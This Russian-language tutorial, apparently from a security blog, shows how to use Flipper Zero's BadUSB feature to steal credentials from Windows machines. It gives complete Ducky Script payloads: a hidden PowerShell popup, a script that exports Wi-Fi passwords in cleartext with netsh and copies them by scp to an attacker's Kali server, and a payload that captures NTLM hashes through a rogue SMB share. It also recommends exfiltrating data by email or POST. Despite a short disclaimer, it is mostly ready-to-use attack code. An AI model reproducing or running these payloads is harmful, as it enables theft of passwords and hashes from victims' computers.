Flipper Zero — это многофункциональное хакерское устройство для специалистов в области кибербезопасности. В предыдущей статье я показал, как используя Flipper Zero атаковать macOS. Сегодня покажу, как использовать атаку BadUSB Flipper Zero для кражи паролей Windows.
Еще по теме: Используем смартфон как BadUSB
Кража паролей с помощью Flipper Zero
Атака Bad USB — это атака, использующая доверие компьютеров к USB-устройствам, таким как клавиатуры. Мы будем использовать эту атаку для получения паролей. Но также и потому, что Flipper Zero предлагает действительно удобный интерфейс для проведения подобных атак.
Статья в образовательных целях и предназначается для обучения этичных хакеров. При написании статьи использовались личные устройства автора. Использование Flipper Zero для несанкционированного получения паролей является незаконным. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
Приведенные ниже полезные нагрузки (скрипты) можно найти по здесь. Кроме того, вы найдете различные скрипты Flipper Zero в статье «Сборник пейлоадов Flipper Zero BadUSB».
Создание простой полезной нагрузки Flipper Zero BadUSB
Первое, что мы собираемся сделать, это создать полезную нагрузку, которая открывает терминал и выполняет команду. Для этого мы будем использовать скрипт Ducky Script — родной язык USB Rubber Ducky.
- Приведенный ниже скрипт запускается с задержкой 100. Это необходимо для того, чтобы убедиться, что компьютер распознал устройство перед выполнением скрипта.
- Затем следует комментарий «открывает окно выполнить».
- Далее скрипт выполняет нажатие клавиши Windows (GUI) и клавиши r. Эта комбинация клавиш открывает диалоговое окно run.
- Затем происходит еще одна задержка в 100 секунд, после чего выполняется ввод строки текста. Эта текстовая строка передается в окно run (выполнить) и указывает системе открыть окно Powershell.
- Затем скрипт с задержкой в 1000 ожидает открытия окна Powershell.
- После этого в скрипт вводится строка, указывающая Powershell на добавление Assembly Name Presentation Framework. Этот фреймворк необходим для создания всплывающих окон.
- Далее скрипт вводит Enter, после чего следует еще одна задержка, а затем еще одна строка. Эта строка создаст всплывающее окно, информирующее пользователя о том, что он был взломан.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
DELAY 100 REM Открывает окно выполнить GUI r DELAY 100 STRING powershell -windowstyle hidden ENTER DELAY 1000 STRING Add-Type -AssemblyName PresentationFramework ENTER DELAY 1000 STRING [System.Windows.MessageBox]::Show('!!! YOU HAVE BEEN HAXED !!!') ENTER DELAY 10000 STRING exit ENTER |
Сохраните скрипт в виде текстового файла и закиньте его в каталог BadUSB на Flipper Zero. Затем, для проверки, необходимо закрыть десктопное приложение Flipper. После этого снова подключите Flipper Zero и перейдите в каталог Bad USB payloads. Затем выберите полезную нагрузку и запустите ее.
Кража паролей Wi-Fi Windows
С извлечением паролей Wi-Fi из целевого компьютера не все так просто. Не стоит использовать приведенный ниже метод, так как он позволяет подобрать пароль к вашему серверу. Он использует SCP для загрузки файлов на ваш сервер, что требует аутентификации. Я использую этот способ для демонстрации кражи паролей Wi-Fi. Вы должны использовать более безопасный способ, например, отправлять данные по электронной почте или POST-запросом на веб-сервер.
Итак, скрипт запускает командную строку Windows и меняет каталог на каталог temp. Далее выполняется команда экспорта сетевых настроек Wi-Fi для точек доступа, сохраненных на компьютере. Он выводит их в виде XML-файлов в каталог %temp%. Далее следует обязательно изменить скрипт. Он использует SCP для передачи файлов на сервер. Однако сервер требует аутентификации, поэтому он добавляет задержку, а затем вводит пароль Kali Linux.
Обратите внимание, что если целевой компьютер ранее не общался с вашим сервером КаІі Linux, то ему сначала нужно будет принять отказ от использования SSH. Этого можно добиться, добавив еще один «ENTER» после команды scp и перед передачей пароля.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
REM Стиллер паролей Wifi DELAY 100 GUI r DELAY 100 STRING cmd ENTER DELAY 1000 STRING cd %temp% ENTER DELAY 1000 REM Экспорт паролей Wi-Fi в формате XML STRING netsh wlan export profile key=clear ENTER DELAY 1000 REM Копирует файлы на хост Kali STRING scp -r %temp%/*.xml kali"192.168.0.56:/home/kali/loot ENTER DELAY 1000 STRING kali ENTER |
На изображении ниже видно, что файлы успешно переданы на сервер Kali Linux с помощью инструмента SCP.
На снимке ниже показан результат работы команды cat с файлом. Выделенный участок — это пароль для точки доступа под названием Super Secure Access Point. Пароль — Password1337!@.
Кража хешей паролей Windows
Следующая полезная нагрузка взята с сайта Hak5 и представляет собой эффективную атаку на машины, подключенные к домену. Кроме того, она позволяет в считанные секунды украсть хеши паролей Windows. Для ее реализации требуется использование Python-скрипта Impacket smbserver.py.
1 2 3 4 5 6 7 |
REM Super Quick Hash Grab Payload for USB Rubber Ducky REM Target: Windows 9X and beyond! Author: Hak5Darren DELAY 1000 GUI r DELAY 100 STRING \\hostname ENTER |
Приведенный ниже снимок экрана демонстрирует кражу хешей паролей Windows с помощью описанной выше полезной нагрузки USB Rubber Ducky. Как видите, пользователь joseph на хосте успешно аутентифицировался на SMB-сервере, передав ему хэш пароля. Теперь этот хеш может быть взломан в оффлайне.
Заключение
Лично я получаю большое удовольствие от работы с Flipper Zero. Причина, по которой мне так нравится функция BadUSB, заключается в удобном пользовательском интерфейсе. Наличие удобного интерфейса для выбора полезной нагрузки значительно повышает удобство использования. Это позволяет хранить несколько полезных нагрузок и легко выбирать одну из них, что может быть очень полезно при проведении физического проникновения (пентеста). Вы можете использовать атаку BadUSB на компьютерах под управлением Windows, Linux и macOS и залить в Flipper различные полезные нагрузки для различных операционных систем.
ПОЛЕЗНЫЕ ССЫЛКИ: